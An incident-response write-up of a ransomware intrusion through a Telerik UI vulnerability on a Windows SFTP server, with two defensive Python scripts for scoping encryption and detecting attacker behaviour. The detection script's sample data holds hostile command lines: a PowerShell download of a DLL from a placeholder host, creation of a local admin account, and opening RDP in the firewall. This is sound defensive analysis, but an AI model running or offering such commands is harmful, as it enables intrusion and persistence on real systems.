Incident Overview
A ransomware attack was investigated on a Windows Server 2012 configured for SFTP operations. The attackers exploited a vulnerability in the Telerik UI for ASP.NET AJAX, which allowed for remote code execution (RCE). This incident escalated from gaining access to the system to preparing and deploying ransomware, with a peculiar diversion to Pornhub during the execution.
Background
The environment under scrutiny was a Windows Server 2012 host used solely for SFTP. Security measures consisted of default Windows Defender settings and default event log sizes. The primary goal was to pinpoint how the attackers infiltrated the system and what activities transpired during their stay.
Exploitation and Initial Access
The server was running an outdated version of Telerik UI, specifically 2016.1.225.45, which is vulnerable to CVE-2019-18935, a critical RCE vulnerability. The attackers exploited this weakness to upload and execute arbitrary files on the server.
Within two weeks, suspicious activity was noted when an InvalidCastException emerged in application logs. After several probes, the attackers successfully dropped a malicious file named ‘wondershare.tmp.tmp’ into the temp directory, followed by fetching a DLL file via PowerShell from a malicious domain.
Establishing Control
Following the successful upload, the attackers created a local admin account named "Depeloyadmin," notable for its unintentional misspelling. They also modified the Winlogon Userinit key to execute a rogue userinit.exe from the temp folder and opened port 3389 for Remote Desktop Protocol (RDP).
Reconnaissance and Return
After a short hiatus, the attackers re-entered using the same exploit to drop a tunneling client, Ngrok.exe, facilitating RDP access back into the system. They established local administrative access via RDP and maintained a connection that resulted in significant data transfer indicative of active RDP sessions.
Execution of Ransomware
Upon gaining control, the attackers executed a rapid encryption of files, renaming them with the .sil3ncer extension, and dropped ransom notes titled SORRY-FOR-FILES.txt across numerous directories. The notes prompted the user to contact the attackers via Telegram without a formal ransom payment portal.
Interestingly, around the same time, forensic evidence indicated a quick visit to Pornhub, suggesting either an attempt to obscure their activities or a diversion of focus while deploying the ransomware.
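For scoping the encryption described above, the following Python script is an added example, not code from the original report or its tooling. It walks a file tree and reports directories that hold the ransom note or in which a large share of files carry the ransomware extension, which helps a responder find impacted directories that the note drop missed. The extension and note filename are the ones the report gives; the directory layout is constructed in a temporary folder by build_sample_tree() so the script runs offline.

```python
import os
import tempfile
from pathlib import Path

RANSOM_EXT = ".sil3ncer"             # extension seen in this incident
RANSOM_NOTE = "SORRY-FOR-FILES.txt"  # ransom note filename seen in this incident


def scope_encryption(root, ext=RANSOM_EXT, note=RANSOM_NOTE, ratio=0.5):
    """Walk root and report directories showing ransomware impact.

    A directory is reported when it contains the ransom note, or when at least
    `ratio` of its files (note excluded) carry the ransomware extension, which
    catches directories the note drop missed.
    Returns {relative_dir: {"encrypted": n, "total": m, "note": bool}}.
    """
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if not files:
            continue
        has_note = note in files
        encrypted = sum(1 for f in files if f.lower().endswith(ext))
        total = len(files) - (1 if has_note else 0)
        if has_note or (total and encrypted / total >= ratio):
            report[os.path.relpath(dirpath, root)] = {
                "encrypted": encrypted, "total": total, "note": has_note}
    return report


def build_sample_tree():
    """Construct a small directory layout imitating the post-encryption state.

    This is sample data created for the example, not evidence from the incident.
    """
    root = Path(tempfile.mkdtemp(prefix="ir-sample-"))
    # Fully encrypted directory with the ransom note dropped alongside.
    (root / "uploads").mkdir()
    for name in ("report.pdf.sil3ncer", "data.csv.sil3ncer", RANSOM_NOTE):
        (root / "uploads" / name).write_text("sample")
    # Partially encrypted directory without a note (caught by the ratio rule).
    (root / "partial").mkdir()
    for name in ("a.txt.sil3ncer", "b.txt.sil3ncer", "c.txt"):
        (root / "partial" / name).write_text("sample")
    # Untouched directory that must not be reported.
    (root / "untouched").mkdir()
    (root / "untouched" / "readme.txt").write_text("sample")
    return root


if __name__ == "__main__":
    for directory, info in scope_encryption(build_sample_tree()).items():
        print(directory, info)
```

Run it against the root of the affected volume instead of the sample tree to get a per-directory impact list; the ratio threshold is a starting point and can be lowered when the encryptor is known to skip certain file types.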
Cleanup and Exit Strategy
To erase traces of their actions, the attackers executed a cleanup script named clear.bat and deleted the rogue admin account. This meticulous step further minimized their digital footprint, leaving behind very few logs.
Lessons Learned
- Patch Regularly: Continuous updates of third-party components can close well-known vulnerabilities.
- Enhance Logging: Increasing event log size and retention prevents critical events from being overwritten before they can be collected during an incident.
- Monitor Commands: Watch for suspicious PowerShell and network firewall manipulation commands.
- Block Tunneling Services: Prohibit tools like Ngrok unless necessary, reducing the risk of unauthorized access methods.
- Secure Remote Access: Enforce stringent controls over RDP access to avoid unauthorized internal re-enabling of connections.
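The Establishing Control and Lessons Learned sections above name the steps a responder should be hunting for on a host like this: a tampered Winlogon Userinit value, a PowerShell download, a local admin account being created, a firewall change exposing port 3389, and a tunnelling client being launched. The following Python script is an added example, not part of the original report or its tooling. It runs the corresponding detection rules over a constructed set of process-creation records (timestamp, user, command line, the fields one would export from Security event 4688 or Sysmon event 1) and checks a Userinit value against the default. The account name and tool names come from the report; the timestamps, command lines, placeholder domain and the expected Userinit path are assumptions made for the example.

```python
import re

# Default value of the Winlogon Userinit key on a stock Windows install
# (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit); the
# trailing comma is normal. Compared case-insensitively.
EXPECTED_USERINIT = r"c:\windows\system32\userinit.exe"

# Detection rules over the process command line, written from the defender's side
# and covering the behaviours the report describes.
RULES = {
    "powershell_download": re.compile(
        r"powershell.*(downloadfile|downloadstring|invoke-webrequest|\biwr\b|-enc)", re.I),
    "firewall_rdp_exposed": re.compile(
        r"netsh\s+advfirewall.*(localport=3389|remote\s*desktop)", re.I),
    "local_admin_created": re.compile(
        r"net\s+(user\s+\S+\s+\S+\s+/add|localgroup\s+administrators\s+\S+\s+/add)", re.I),
    "tunnel_client": re.compile(r"\bngrok(\.exe)?\b", re.I),
}


def check_userinit(value):
    """Return a finding for every executable listed in Userinit that is not the default."""
    findings = []
    for entry in value.split(","):
        entry = entry.strip().strip('"')
        if entry and entry.lower() != EXPECTED_USERINIT:
            findings.append(f"userinit_tampered: {entry}")
    return findings


def scan_command_lines(events):
    """Apply RULES to (timestamp, user, command_line) records; return (ts, user, rule) hits."""
    findings = []
    for ts, user, cmd in events:
        for name, pattern in RULES.items():
            if pattern.search(cmd):
                findings.append((ts, user, name))
    return findings


# Constructed sample records (not evidence from the incident). The domain is a placeholder.
SAMPLE_EVENTS = [
    ("2020-01-01T10:02:11", r"IIS APPPOOL\Site",
     r'''powershell.exe -nop -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/payload.dll','C:\Windows\Temp\payload.dll')"'''),
    ("2020-01-01T10:05:40", "SYSTEM", "net user Depeloyadmin <placeholder-password> /add"),
    ("2020-01-01T10:05:41", "SYSTEM", "net localgroup administrators Depeloyadmin /add"),
    ("2020-01-01T10:06:02", "SYSTEM",
     'netsh advfirewall firewall add rule name="rdp" dir=in action=allow protocol=TCP localport=3389'),
    ("2020-01-01T10:07:15", "SYSTEM", r"C:\Windows\Temp\ngrok.exe"),
    ("2020-01-01T10:08:00", r"CORP\svc_sftp", r"C:\Windows\System32\svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for hit in scan_command_lines(SAMPLE_EVENTS):
        print(*hit)
    print(check_userinit(r"C:\Windows\system32\userinit.exe,C:\Windows\Temp\userinit.exe"))
```

Feed it real records by exporting command lines from the Security log (with command-line auditing enabled) or Sysmon, and read the live Userinit value with a registry query; the point of keeping each behaviour as a separate named rule is that a hit on any one of them on an SFTP-only server is worth a look, while the full sequence within minutes is the pattern this report describes.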
Conclusion
The incident illustrates the dangers of outdated software and the importance of robust security practices. By ensuring regular updates, diligent monitoring, and enhanced security controls, organizations can mitigate risks of similar attacks. If your server logs indicate unexpected behavior—like an SFTP server entangled with browsing histories of adult sites—it’s a clear sign that your outbound rules require urgent revision.